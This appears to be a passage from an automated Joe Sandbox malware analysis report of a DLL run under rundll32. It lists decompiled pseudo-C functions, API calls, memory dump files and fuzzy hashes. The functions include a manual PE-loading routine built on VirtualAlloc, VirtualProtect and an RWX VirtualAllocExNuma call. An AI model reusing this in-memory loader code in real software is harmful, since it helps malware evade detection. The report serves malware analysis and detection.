                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,00000000,?,00000040,00000010,00000000,0000000F,100047D0,?,00000000,10004340,10004350,10004370,00000000), ref: 100045B2
                                                                                                                                • SetLastError.KERNEL32(000000C1,00000000,?,00000040,00000010,00000000,0000000F,100047D0,?,00000000,10004340,10004350,10004370,00000000,10003A63,00000000), ref: 100045D9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$InfoNativeSystem
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3902313427-0
                                                                                                                                • Opcode ID: c6fd34f4addf312a17fd4a0b55a816a8bca61e53f64dce2c2923f383c8579b65
                                                                                                                                • Instruction ID: a884f337d3fb6e3feb3d3e86e5afcf7fae1a1a5031e57e08741fb19a7bb57766
                                                                                                                                • Opcode Fuzzy Hash: c6fd34f4addf312a17fd4a0b55a816a8bca61e53f64dce2c2923f383c8579b65
                                                                                                                                • Instruction Fuzzy Hash: 5681DFB6605706AFE350DF65DC80B67B3E8FF88380F01452DEA4987245EB71E948CB99
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 10005838, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                C-Code - Quality: 91%
                                                                                                                                			E10005838(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t50;
				void* _t54;
				intOrPtr _t57;
				intOrPtr* _t59;
				intOrPtr* _t63;
				void* _t76;
				void* _t77;
				intOrPtr* _t80;
				char* _t81;
				char _t84;
				intOrPtr* _t87;
				intOrPtr* _t118;
				intOrPtr* _t123;
				void* _t124;
				void* _t125;

				_push(0x54);
				E10007B94(E1001557E, __ebx, __edi, __esi);
				_t84 =  *((intOrPtr*)(_t124 + 8));
				_t123 = __ecx;
				if(_t84 != 0xffffffff) {
					_t87 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x24))));
					_t118 = 0;
					__eflags = _t87;
					if(_t87 == 0) {
						L7:
						_t50 =  *((intOrPtr*)(_t123 + 0x4c));
						__eflags = _t50 - _t118;
						if(_t50 != _t118) {
							__eflags =  *((intOrPtr*)(_t123 + 0x3c)) - _t118;
							if(__eflags != 0) {
								 *((char*)(_t124 - 0x30)) = _t84;
								E1000563A(_t84, _t124 - 0x2c, _t109, 8, _t118);
								 *((intOrPtr*)(_t124 - 4)) = _t118;
								_t54 = E10004AEE(E10005335(_t124 - 0x2c, _t124 - 0x48));
								_t57 = E10004AEE(E10005335(_t124 - 0x2c, _t124 - 0x50));
								_t118 =  *((intOrPtr*)(_t124 - 0x18)) + _t54;
								_push(_t124 - 0x38);
								_t84 = _t123 + 0x44;
								while(1) {
									_t113 = _t124 - 0x30;
									 *((intOrPtr*)(_t124 - 0x34)) = _t57;
									_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x3c)))) + 0x14))(_t84, _t124 - 0x30, _t124 - 0x2f, _t124 - 0x3c, _t57, _t118);
									__eflags = _t59;
									if(_t59 < 0) {
										break;
									}
									__eflags = _t59 - 1;
									if(_t59 > 1) {
										__eflags = _t59 - 3;
										if(__eflags != 0) {
											goto L25;
										} else {
											_t63 = E1000513D(__eflags,  *((intOrPtr*)(_t124 - 0x30)),  *((intOrPtr*)(_t123 + 0x4c)));
											__eflags = _t63;
											if(_t63 != 0) {
												goto L27;
											} else {
												goto L25;
											}
										}
									} else {
										_t118 =  *((intOrPtr*)(_t124 - 0x38)) - E10004AEE(E10005335(_t124 - 0x2c, _t124 - 0x58));
										__eflags = _t118;
										if(_t118 == 0) {
											L16:
											_t67 = _t124 - 0x30;
											 *((char*)(_t123 + 0x41)) = 1;
											__eflags =  *((intOrPtr*)(_t124 - 0x3c)) - _t124 - 0x30;
											if( *((intOrPtr*)(_t124 - 0x3c)) != _t124 - 0x30) {
												L27:
												_t123 =  *((intOrPtr*)(_t124 + 8));
											} else {
												__eflags = _t118;
												if(_t118 > 0) {
													L20:
													 *((intOrPtr*)(_t124 - 0x40)) = E10004AEE(E10005335(_t124 - 0x2c, _t124 - 0x48));
													_t57 = E10004AEE(E10005335(_t124 - 0x2c, _t124 - 0x50));
													_push(_t124 - 0x38);
													_t118 =  *((intOrPtr*)(_t124 - 0x18)) +  *((intOrPtr*)(_t124 - 0x40));
													__eflags = _t118;
													continue;
												} else {
													__eflags =  *((intOrPtr*)(_t124 - 0x18)) - 0x20;
													if( *((intOrPtr*)(_t124 - 0x18)) >= 0x20) {
														goto L25;
													} else {
														E1000540E(_t67, _t124 - 0x2c, _t113, _t123, 8, 0);
														goto L20;
													}
												}
											}
										} else {
											_t76 = E10004AEE(E10005335(_t124 - 0x2c, _t124 - 0x60));
											_push( *((intOrPtr*)(_t123 + 0x4c)));
											_push(_t118);
											_push(1);
											_push(_t76);
											_t77 = E1000910B(_t84, _t113, _t118, _t123, __eflags);
											_t125 = _t125 + 0x10;
											__eflags = _t118 - _t77;
											if(_t118 != _t77) {
												L25:
												__eflags = _t123;
											} else {
												goto L16;
											}
										}
									}
									E10001220(_t124 - 0x2c, _t124, 1, 0);
									goto L2;
								}
								goto L25;
							} else {
								_t50 = E1000513D(__eflags, _t84, _t50); // executed
								__eflags = _t50;
								if(_t50 == 0) {
									goto L8;
								} else {
									goto L6;
								}
							}
						} else {
							L8:
						}
					} else {
						_t80 =  *((intOrPtr*)(__ecx + 0x34));
						_t109 =  *_t80 + _t87;
						__eflags = _t87 -  *_t80 + _t87;
						if(_t87 >=  *_t80 + _t87) {
							goto L7;
						} else {
							 *_t80 =  *_t80 - 1;
							__eflags =  *_t80;
							_t123 =  *((intOrPtr*)(__ecx + 0x24));
							_t81 =  *_t123;
							 *_t123 = _t81 + 1;
							 *_t81 = _t84;
							L6:
						}
					}
				} else {
				}
				L2:
				return E10007BDE(_t84, _t118, _t123);
			}


















                                                                                                                                0x10005838
                                                                                                                                0x1000583f
                                                                                                                                0x10005844
                                                                                                                                0x10005847
                                                                                                                                0x1000584c
                                                                                                                                0x1000585b
                                                                                                                                0x1000585d
                                                                                                                                0x1000585f
                                                                                                                                0x10005861
                                                                                                                                0x10005880
                                                                                                                                0x10005880
                                                                                                                                0x10005883
                                                                                                                                0x10005885
                                                                                                                                0x1000588c
                                                                                                                                0x1000588f
                                                                                                                                0x100058a6
                                                                                                                                0x100058a9
                                                                                                                                0x100058b5
                                                                                                                                0x100058bf
                                                                                                                                0x100058d7
                                                                                                                                0x100058df
                                                                                                                                0x100058e1
                                                                                                                                0x100058e2
                                                                                                                                0x10005992
                                                                                                                                0x1000599f
                                                                                                                                0x100059a3
                                                                                                                                0x100059a9
                                                                                                                                0x100059ac
                                                                                                                                0x100059ae
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x100058ea
                                                                                                                                0x100058ed
                                                                                                                                0x100059b6
                                                                                                                                0x100059b9
                                                                                                                                0x00000000
                                                                                                                                0x100059bb
                                                                                                                                0x100059c1
                                                                                                                                0x100059c8
                                                                                                                                0x100059ca
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x100059ca
                                                                                                                                0x100058f3
                                                                                                                                0x10005909
                                                                                                                                0x10005909
                                                                                                                                0x1000590b
                                                                                                                                0x10005937
                                                                                                                                0x10005937
                                                                                                                                0x1000593a
                                                                                                                                0x1000593e
                                                                                                                                0x10005941
                                                                                                                                0x100059e2
                                                                                                                                0x100059e2
                                                                                                                                0x10005947
                                                                                                                                0x10005947
                                                                                                                                0x10005949
                                                                                                                                0x1000595d
                                                                                                                                0x10005973
                                                                                                                                0x10005984
                                                                                                                                0x1000598c
                                                                                                                                0x10005990
                                                                                                                                0x10005990
                                                                                                                                0x00000000
                                                                                                                                0x1000594b
                                                                                                                                0x1000594b
                                                                                                                                0x1000594f
                                                                                                                                0x00000000
                                                                                                                                0x10005951
                                                                                                                                0x10005958
                                                                                                                                0x00000000
                                                                                                                                0x10005958
                                                                                                                                0x1000594f
                                                                                                                                0x10005949
                                                                                                                                0x1000590d
                                                                                                                                0x1000591b
                                                                                                                                0x10005920
                                                                                                                                0x10005923
                                                                                                                                0x10005924
                                                                                                                                0x10005926
                                                                                                                                0x10005927
                                                                                                                                0x1000592c
                                                                                                                                0x1000592f
                                                                                                                                0x10005931
                                                                                                                                0x100059cc
                                                                                                                                0x100059cc
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10005931
                                                                                                                                0x1000590b
                                                                                                                                0x100059d6
                                                                                                                                0x00000000
                                                                                                                                0x100059db
                                                                                                                                0x00000000
                                                                                                                                0x10005891
                                                                                                                                0x10005893
                                                                                                                                0x1000589a
                                                                                                                                0x1000589c
                                                                                                                                0x00000000
                                                                                                                                0x1000589e
                                                                                                                                0x00000000
                                                                                                                                0x1000589e
                                                                                                                                0x1000589c
                                                                                                                                0x10005887
                                                                                                                                0x10005887
                                                                                                                                0x10005887
                                                                                                                                0x10005863
                                                                                                                                0x10005863
                                                                                                                                0x10005868
                                                                                                                                0x1000586a
                                                                                                                                0x1000586c
                                                                                                                                0x00000000
                                                                                                                                0x1000586e
                                                                                                                                0x1000586e
                                                                                                                                0x1000586e
                                                                                                                                0x10005870
                                                                                                                                0x10005873
                                                                                                                                0x10005878
                                                                                                                                0x1000587a
                                                                                                                                0x1000587c
                                                                                                                                0x1000587c
                                                                                                                                0x1000586c
                                                                                                                                0x1000584e
                                                                                                                                0x1000584e
                                                                                                                                0x10005850
                                                                                                                                0x10005855

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Fputc$H_prolog3_
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2569218679-3916222277
                                                                                                                                • Opcode ID: a884318f4328bbd472d3bb720561ede03dd2b99da71aac4f53e77f2ee89f8c52
                                                                                                                                • Instruction ID: f54ee80827257d936e0228d5c33a263367e2bb758273396e4a1a0a6abebb7dc9
                                                                                                                                • Opcode Fuzzy Hash: a884318f4328bbd472d3bb720561ede03dd2b99da71aac4f53e77f2ee89f8c52
                                                                                                                                • Instruction Fuzzy Hash: A7519F7AA00644DFEF14CBA4C8819DFB7B5EF483D1F618519E512A7289EF72BA04CB50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 10003ED0, Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 265 10003ed0-10003eda 266 10003ee3-10003eec 265->266 267 10003edc-10003ee0 265->267 268 10003f2a-10003f51 266->268 269 10003eee-10003ef3 266->269 270 10003f53 268->270 271 10003f59-10003f71 VirtualProtect 268->271 272 10003f20-10003f27 269->272 273 10003ef5-10003ef9 269->273 270->271 274 10003f13-10003f1a VirtualFree 273->274 275 10003efb-10003f07 273->275 274->272 275->274 276 10003f09-10003f11 275->276 276->272 276->274
                                                                                                                                C-Code - Quality: 94%
                                                                                                                                			E10003ED0(intOrPtr* _a4, long _a8) {
				signed int _t25;
				signed int _t27;
				intOrPtr* _t32;
				void** _t37;
				signed int _t39;
				long _t45;
				void* _t55;
				long _t57;

				_t37 = _a8;
				_t57 = _t37[2];
				if(_t57 != 0) {
					_t25 = _t37[3];
					if((_t25 & 0x02000000) == 0) {
						_t45 =  *(0x1001b144 + ((_t25 >> 0x1f) + ((_t25 >> 0x0000001e & 0x00000001) + (_t25 >> 0x0000001d & 0x00000001) * 2) * 2) * 4);
						if((_t25 & 0x04000000) != 0) {
							_t45 = _t45 | 0x00000200;
						}
						_t27 = VirtualProtect( *_t37, _t57, _t45,  &_a8); // executed
						asm("sbb eax, eax");
						return  ~( ~_t27);
					} else {
						_t55 =  *_t37;
						if(_t55 == _t37[1]) {
							if(_t37[4] != 0) {
								L7:
								VirtualFree(_t55, _t57, 0x4000); // executed
							} else {
								_t32 = _a4;
								_t39 =  *(_t32 + 0x30);
								if( *((intOrPtr*)( *_t32 + 0x38)) == _t39 || _t57 % _t39 == 0) {
									goto L7;
								}
							}
						}
						return 1;
					}
				} else {
					return _t57 + 1;
				}
			}











                                                                                                                                0x10003ed0
                                                                                                                                0x10003ed5
                                                                                                                                0x10003eda
                                                                                                                                0x10003ee3
                                                                                                                                0x10003eec
                                                                                                                                0x10003f45
                                                                                                                                0x10003f51
                                                                                                                                0x10003f53
                                                                                                                                0x10003f53
                                                                                                                                0x10003f63
                                                                                                                                0x10003f6b
                                                                                                                                0x10003f71
                                                                                                                                0x10003eee
                                                                                                                                0x10003eee
                                                                                                                                0x10003ef3
                                                                                                                                0x10003ef9
                                                                                                                                0x10003f13
                                                                                                                                0x10003f1a
                                                                                                                                0x10003efb
                                                                                                                                0x10003efb
                                                                                                                                0x10003eff
                                                                                                                                0x10003f07
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10003f07
                                                                                                                                0x10003ef9
                                                                                                                                0x10003f27
                                                                                                                                0x10003f27
                                                                                                                                0x10003edc
                                                                                                                                0x10003ee0
                                                                                                                                0x10003ee0

                                                                                                                                APIs
                                                                                                                                • VirtualFree.KERNELBASE(?,?,00004000,-00000027,00000000,100040AE,?,?), ref: 10003F1A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                • Opcode ID: b39a3beb2d98f3bab114e4e754a4af2823bffd341a29ed4bde50550ae92bfda1
                                                                                                                                • Instruction ID: 062725d00f4cf23427ed1042fe15ee65968b5e79625691509249fc532a46f6e0
                                                                                                                                • Opcode Fuzzy Hash: b39a3beb2d98f3bab114e4e754a4af2823bffd341a29ed4bde50550ae92bfda1
                                                                                                                                • Instruction Fuzzy Hash: 85118F36A042139BE341CA19D884FA773AAFBC5390F56C669E4458B298D731EC42C790
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 10001050, Relevance: 3.0, APIs: 2, Instructions: 25memoryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 277 10001050-10001072 GetCurrentProcess VirtualAllocExNuma 278 10001074 277->278 279 1000107e-10001091 call 10006bf0 277->279 278->279
                                                                                                                                C-Code - Quality: 46%
                                                                                                                                			E10001050(intOrPtr _a8) {
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* _t3;
				void* _t7;
				void* _t9;

				_t8 = _a8;
				_push(0);
				_push(0x40);
				_push(0x3000);
				_push(_a8);
				_push(0);
				_t3 = GetCurrentProcess();
				_push(_t3); // executed
				L100047D4(); // executed
				_t9 = _t3;
				if(_t9 != 0) {
					 *0x1001b044 = 0;
				}
				E10006BF0(_t7, _t8, _t9, _t9, _v20, _t8);
				return _t9;
			}









                                                                                                                                0x10001052
                                                                                                                                0x10001056
                                                                                                                                0x10001058
                                                                                                                                0x1000105a
                                                                                                                                0x1000105f
                                                                                                                                0x10001060
                                                                                                                                0x10001062
                                                                                                                                0x10001068
                                                                                                                                0x10001069
                                                                                                                                0x1000106e
                                                                                                                                0x10001072
                                                                                                                                0x10001074
                                                                                                                                0x10001074
                                                                                                                                0x10001085
                                                                                                                                0x10001091

                                                                                                                                APIs
                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,745FD360,00003000,00000040,00000000,00000010,745FD360,100037DE,?,00000011), ref: 10001062
                                                                                                                                • VirtualAllocExNuma.KERNEL32(00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10001069
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocCurrentNumaProcessVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 346376999-0
                                                                                                                                • Opcode ID: 2fd65e3a78f7370afcb230f8d38f5365579a55a7de8ef90f74ca61644ae3f8a0
                                                                                                                                • Instruction ID: 007a731be77cd4dfc1ab7fe5343192b3b75cb8ea39ff0d8a89b7cdf0d5bda86e
                                                                                                                                • Opcode Fuzzy Hash: 2fd65e3a78f7370afcb230f8d38f5365579a55a7de8ef90f74ca61644ae3f8a0
                                                                                                                                • Instruction Fuzzy Hash: 67E08676A0526077F13197599C15F4B66ACDFC5B90F014014F7049B1A4C7B4E80083A5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 10003DA0, Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 282 10003da0-10003dca 283 10003dd0-10003dd9 282->283 284 10003e84-10003e90 282->284 285 10003de0-10003de4 283->285 286 10003de6-10003def 285->286 287 10003e1c-10003e32 call 10003d80 285->287 288 10003df1-10003e03 VirtualAlloc 286->288 289 10003e66-10003e7e 286->289 291 10003e93-10003e9c 287->291 295 10003e34-10003e48 VirtualAlloc 287->295 288->291 292 10003e09-10003e1a call 10003c50 288->292 289->284 289->285 298 10003e63 292->298 295->291 297 10003e4a-10003e60 call 10003c80 295->297 297->298 298->289
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E10003DA0(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t38;
				intOrPtr _t44;
				void* _t47;
				intOrPtr _t66;
				long _t67;
				long* _t70;
				void* _t76;

				_t76 =  &_v8;
				_t27 = _a16;
				_t44 =  *((intOrPtr*)(_t27 + 4));
				_t28 =  *_t27;
				_v4 = __ecx;
				_t47 = ( *(_t28 + 0x14) & 0x0000ffff) + _t28 + 0x18;
				_v8 = 0;
				if(0 >=  *((intOrPtr*)(_t28 + 6))) {
					L11:
					return 1;
				} else {
					_t70 = _t47 + 0x10;
					do {
						_t30 =  *_t70;
						if( *_t70 != 0) {
							if(E10003D80(_a8, _t70[1] + _t30) == 0) {
								goto L12;
							} else {
								_t34 = VirtualAlloc( *((intOrPtr*)(_t70 - 4)) + _t44,  *_t70, 0x1000, 4); // executed
								if(_t34 == 0) {
									goto L12;
								} else {
									_t66 =  *((intOrPtr*)(_t70 - 4)) + _t44;
									E10003C80(_t66, _t70[1] + _a4,  *_t70);
									 *((intOrPtr*)(_t70 - 8)) = _t66;
									goto L9;
								}
							}
						} else {
							_t67 =  *(_a12 + 0x38);
							if(_t67 <= 0) {
								goto L10;
							} else {
								if(VirtualAlloc( *((intOrPtr*)(_t70 - 4)) + _t44, _t67, 0x1000, 4) == 0) {
									L12:
									return 0;
								} else {
									 *((intOrPtr*)(_t70 - 8)) =  *((intOrPtr*)(_t70 - 4)) + _t44;
									E10003C50( *((intOrPtr*)(_t70 - 4)) + _t44, 0, _t67);
									L9:
									_t76 = _t76 + 0xc;
									goto L10;
								}
							}
						}
						goto L13;
						L10:
						_t38 = _v8 + 1;
						_t70 =  &(_t70[0xa]);
						_v8 = _t38;
					} while (_t38 < ( *( *_a16 + 6) & 0x0000ffff));
					goto L11;
				}
				L13:
			}















                                                                                                                                0x10003da0
                                                                                                                                0x10003da3
                                                                                                                                0x10003da8
                                                                                                                                0x10003dab
                                                                                                                                0x10003dad
                                                                                                                                0x10003dba
                                                                                                                                0x10003dbe
                                                                                                                                0x10003dca
                                                                                                                                0x10003e84
                                                                                                                                0x10003e90
                                                                                                                                0x10003dd0
                                                                                                                                0x10003dd6
                                                                                                                                0x10003de0
                                                                                                                                0x10003de0
                                                                                                                                0x10003de4
                                                                                                                                0x10003e32
                                                                                                                                0x00000000
                                                                                                                                0x10003e34
                                                                                                                                0x10003e44
                                                                                                                                0x10003e48
                                                                                                                                0x00000000
                                                                                                                                0x10003e4a
                                                                                                                                0x10003e57
                                                                                                                                0x10003e5b
                                                                                                                                0x10003e60
                                                                                                                                0x00000000
                                                                                                                                0x10003e60
                                                                                                                                0x10003e48
                                                                                                                                0x10003de6
                                                                                                                                0x10003dea
                                                                                                                                0x10003def
                                                                                                                                0x00000000
                                                                                                                                0x10003df1
                                                                                                                                0x10003e03
                                                                                                                                0x10003e93
                                                                                                                                0x10003e9c
                                                                                                                                0x10003e09
                                                                                                                                0x10003e12
                                                                                                                                0x10003e15
                                                                                                                                0x10003e63
                                                                                                                                0x10003e63
                                                                                                                                0x00000000
                                                                                                                                0x10003e63
                                                                                                                                0x10003e03
                                                                                                                                0x10003def
                                                                                                                                0x00000000
                                                                                                                                0x10003e66
                                                                                                                                0x10003e74
                                                                                                                                0x10003e75
                                                                                                                                0x10003e7a
                                                                                                                                0x10003e7a
                                                                                                                                0x00000000
                                                                                                                                0x10003de0
                                                                                                                                0x00000000

                                                                                                                                APIs
                                                                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 10003DFF
                                                                                                                                  • Part of subcall function 10003C50: _memset.LIBCMT ref: 10003C64
                                                                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?), ref: 10003E44
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual$_memset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1876456587-0
                                                                                                                                • Opcode ID: f7401d659560031d9c17cb10a26f9ff5ef52e57436c2b187bbb76e7774026977
                                                                                                                                • Instruction ID: f15a86c0704b51378d86cbb5121b1bdfad3b0682261688cfccde8590deb210b6
                                                                                                                                • Opcode Fuzzy Hash: f7401d659560031d9c17cb10a26f9ff5ef52e57436c2b187bbb76e7774026977
                                                                                                                                • Instruction Fuzzy Hash: 04319A796042419BE321CF08DC81F6BB3E9EF88794F15892DE9858B384D774EC49CB61
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 1000D836, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 301 1000d836-1000d858 HeapCreate 302 1000d85a-1000d85b 301->302 303 1000d85c-1000d865 301->303
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E1000D836(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x1001ce68 = _t6;
				if(_t6 != 0) {
					 *0x1001d0e8 = 1;
					return 1;
				} else {
					return _t6;
				}
			}




                                                                                                                                0x1000d84b
                                                                                                                                0x1000d851
                                                                                                                                0x1000d858
                                                                                                                                0x1000d85f
                                                                                                                                0x1000d865
                                                                                                                                0x1000d85b
                                                                                                                                0x1000d85b
                                                                                                                                0x1000d85b

                                                                                                                                APIs
                                                                                                                                • HeapCreate.KERNEL32(00000000,00001000,00000000,?,1000785F,00000001,?,?,?,100079D8,?,?,?,10019940,0000000C,10007A93), ref: 1000D84B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 10892065-0
                                                                                                                                • Opcode ID: 65a3d92e3d7f1cc1d90ebd64833507f7266d361247d4ac070330bcf6be479330
                                                                                                                                • Instruction ID: 59f3d8791c48984054e83102fb7f906e2498ca7f63999e22f95c15770e28c664
                                                                                                                                • Opcode Fuzzy Hash: 65a3d92e3d7f1cc1d90ebd64833507f7266d361247d4ac070330bcf6be479330
                                                                                                                                • Instruction Fuzzy Hash: 15D0A772590359AEFB00AF706C88B263BDCD3887D5F14C436F80DC6150F574C980C600
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 1000B863, Relevance: 1.5, APIs: 1, Instructions: 6COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 304 1000b863-1000b869 call 1000b721 306 1000b86e-1000b871 304->306
                                                                                                                                C-Code - Quality: 25%
                                                                                                                                			E1000B863() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E1000B721(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}








                                                                                                                                0x1000b863
                                                                                                                                0x1000b865
                                                                                                                                0x1000b867
                                                                                                                                0x1000b869
                                                                                                                                0x1000b871

                                                                                                                                APIs
                                                                                                                                • _doexit.LIBCMT ref: 1000B869
                                                                                                                                  • Part of subcall function 1000B721: __lock.LIBCMT ref: 1000B72F
                                                                                                                                  • Part of subcall function 1000B721: __decode_pointer.LIBCMT ref: 1000B766
                                                                                                                                  • Part of subcall function 1000B721: __decode_pointer.LIBCMT ref: 1000B77B
                                                                                                                                  • Part of subcall function 1000B721: __decode_pointer.LIBCMT ref: 1000B7A5
                                                                                                                                  • Part of subcall function 1000B721: __decode_pointer.LIBCMT ref: 1000B7BB
                                                                                                                                  • Part of subcall function 1000B721: __decode_pointer.LIBCMT ref: 1000B7C8
                                                                                                                                  • Part of subcall function 1000B721: __initterm.LIBCMT ref: 1000B7F7
                                                                                                                                  • Part of subcall function 1000B721: __initterm.LIBCMT ref: 1000B807
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
